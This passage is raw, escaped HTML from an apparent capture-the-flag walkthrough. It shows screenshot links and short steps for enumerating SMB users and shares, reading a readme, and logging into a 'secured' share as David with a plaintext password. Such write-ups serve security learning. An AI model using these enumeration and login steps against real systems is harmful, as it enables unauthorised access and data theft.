/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Also, two users named &lt;b&gt;david&lt;/b&gt; and &lt;b&gt;rick&lt;/b&gt;:&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmKs8gQW0thlCfuEIOXyJZgwiGriPwXdUc58_oVc4OjxXpSZ2-XZrn-KXf2b2nHq1ivCLz56UPIWlwobxMW7Z1Pb9zcCI3CjaVu16dl4rmRp8KN-99XzKjV1phprP8cxLpGrTonPKTJyr/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;280&quot; data-original-width=&quot;844&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinmKs8gQW0thlCfuEIOXyJZgwiGriPwXdUc58_oVc4OjxXpSZ2-XZrn-KXf2b2nHq1ivCLz56UPIWlwobxMW7Z1Pb9zcCI3CjaVu16dl4rmRp8KN-99XzKjV1phprP8cxLpGrTonPKTJyr/s16000/screenshot.16.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Accessing &lt;b&gt;anonymous&lt;/b&gt; we find some directories, however there is nothing remarkable inside them:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3HRIhMFRUlDOFkIzDL8bROCMGXj2OKMLmIR_3-JaPl0783aqrr8Nd7l9LQcZiiQx5FXLs7U5-dzAnW_lwMPWe-hpLeUvFisbZst9IWk9wo1dcATG-ORV7KTi1rLBTotad2f4utDabzfLt/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;369&quot; data-original-width=&quot;851&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3HRIhMFRUlDOFkIzDL8bROCMGXj2OKMLmIR_3-JaPl0783aqrr8Nd7l9LQcZiiQx5FXLs7U5-dzAnW_lwMPWe-hpLeUvFisbZst9IWk9wo1dcATG-ORV7KTi1rLBTotad2f4utDabzfLt/s16000/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting &lt;b&gt;readme.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1zM3K3UqyCt2yck8SiDjepKTgdmHjJqSSwWRTB7V6RVE75-7ko33lBuP6xLQYbzeSMUqJ-qT7jG9P-gF8_hemLdMDbLl2yf02gCS8x5vr5Q-pds51BZdSVpTQgGGejZWHuuBogQ3q_8rO/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;277&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1zM3K3UqyCt2yck8SiDjepKTgdmHjJqSSwWRTB7V6RVE75-7ko33lBuP6xLQYbzeSMUqJ-qT7jG9P-gF8_hemLdMDbLl2yf02gCS8x5vr5Q-pds51BZdSVpTQgGGejZWHuuBogQ3q_8rO/s16000/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;readme.txt&lt;/b&gt; informs us about the internal file-sharing system across SMB:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzeaUFYXScRT5ELl9zFURlohyphenhyphenp0sg_0xK_Awd4_g604Xk2CeTp8yBsztehXkIYWaZ0JQRjjhXi1WFQC_NM6ThcZU9-8ERT72QKS-VvGJ3V1h8EvLn9wMuwIle4bY7lZEKQvayYWGKIpFs8/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;344&quot; data-original-width=&quot;880&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzeaUFYXScRT5ELl9zFURlohyphenhyphenp0sg_0xK_Awd4_g604Xk2CeTp8yBsztehXkIYWaZ0JQRjjhXi1WFQC_NM6ThcZU9-8ERT72QKS-VvGJ3V1h8EvLn9wMuwIle4bY7lZEKQvayYWGKIpFs8/s16000/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to folder&lt;b&gt; secured&lt;/b&gt; as user &lt;b&gt;David&lt;/b&gt;, and using password&amp;nbsp;&lt;b&gt;qwertyuioplkjhgfdsazxcvbnm&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpDXqAcCLuXc_Z205LnrUisiC8Xc4-P0aD7U6936Q82TRpEcyRo4zqc2dhz4Cgi5S7ZZ-qWtJpDbeu-hir96g7bvvagwdHVdwCglX7dlVDD2hJoXwe3kn6uGGOMBpoKMcDiE4NJbG7oYI_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;259&quot; data-original-width=&quot;818&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpDXqAcCLuXc_Z205LnrUisiC8Xc4-P0aD7U6936Q82TRpEcyRo4zqc2dhz4Cgi5S7ZZ-qWtJpDbeu-hir96g7bvvagwdHVdwCglX7dlVDD2hJoXwe3kn6uGGOMBpoKMcDiE4NJbG7oYI_/s16000/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Getting all text files:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwBbzwFOoRcWD77xcOPnLdqpS-3gqwse3EIyn5U38XRW9uNe3EfUNKP_HA8-Yh7uEjd9BVJ-yZ5AZvxEyXpalGLYZhNLPQbmz7mAsVLLG5Eu-pU3xRvmtXxT_f98hXZCJBEx2xFQoQDq1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;299&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwBbzwFOoRcWD77xcOPnLdqpS-3gqwse3EIyn5U38XRW9uNe3EfUNKP_HA8-Yh7uEjd9BVJ-yZ5AZvxEyXpalGLYZhNLPQbmz7mAsVLLG5Eu-pU3xRvmtXxT_f98hXZCJBEx2xFQoQDq1/s16000/screenshot.23.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the files we discover some web pages:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGDzUOGeAbvGV1gcRfXyJi_6gLAY_VdAb9nCh6uGkXnCHE7Rue5evcCa-RnWeJ5uw7FIkapyM0nvaXPqQx8H-GSPUazz1htsvTv9kBJrP5zpHYuf38WXDAG6PBiYMAa9m51Fa49R3hu3O/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;230&quot; data-original-width=&quot;768&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGDzUOGeAbvGV1gcRfXyJi_6gLAY_VdAb9nCh6uGkXnCHE7Rue5evcCa-RnWeJ5uw7FIkapyM0nvaXPqQx8H-GSPUazz1htsvTv9kBJrP5zpHYuf38WXDAG6PBiYMAa9m51Fa49R3hu3O/s16000/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw_d0weGStNKwA47qipaOXo4roOo9jHfPepknWidFaZ4HtryqiCFmzNcFZtf3W6KE0MUf8GYJtPH9fbPmikDZ2BYo4Q-oirOSMOlTfaCoMjOGdL3ic2q4BZ6ig2iYO2BGl-6C43wRGo2K0/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;301&quot; data-original-width=&quot;771&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw_d0weGStNKwA47qipaOXo4roOo9jHfPepknWidFaZ4HtryqiCFmzNcFZtf3W6KE0MUf8GYJtPH9fbPmikDZ2BYo4Q-oirOSMOlTfaCoMjOGdL3ic2q4BZ6ig2iYO2BGl-6C43wRGo2K0/s16000/screenshot.25.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIwmGFHTIbCHKzIG3eqTrZd2aR1LQC4rL5pHPvlZJblXFmYJ51WPJK1YS9OsVJW2IOb0-2I34dHtL5QAWYY9CEYCz7GC1mkSHCzLErX8aIkhqXs2RG3NhXfH8GwDf5Qf27JItY7f4UmJC/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;252&quot; data-original-width=&quot;809&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIwmGFHTIbCHKzIG3eqTrZd2aR1LQC4rL5pHPvlZJblXFmYJ51WPJK1YS9OsVJW2IOb0-2I34dHtL5QAWYY9CEYCz7GC1mkSHCzLErX8aIkhqXs2RG3NhXfH8GwDf5Qf27JItY7f4UmJC/s16000/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: 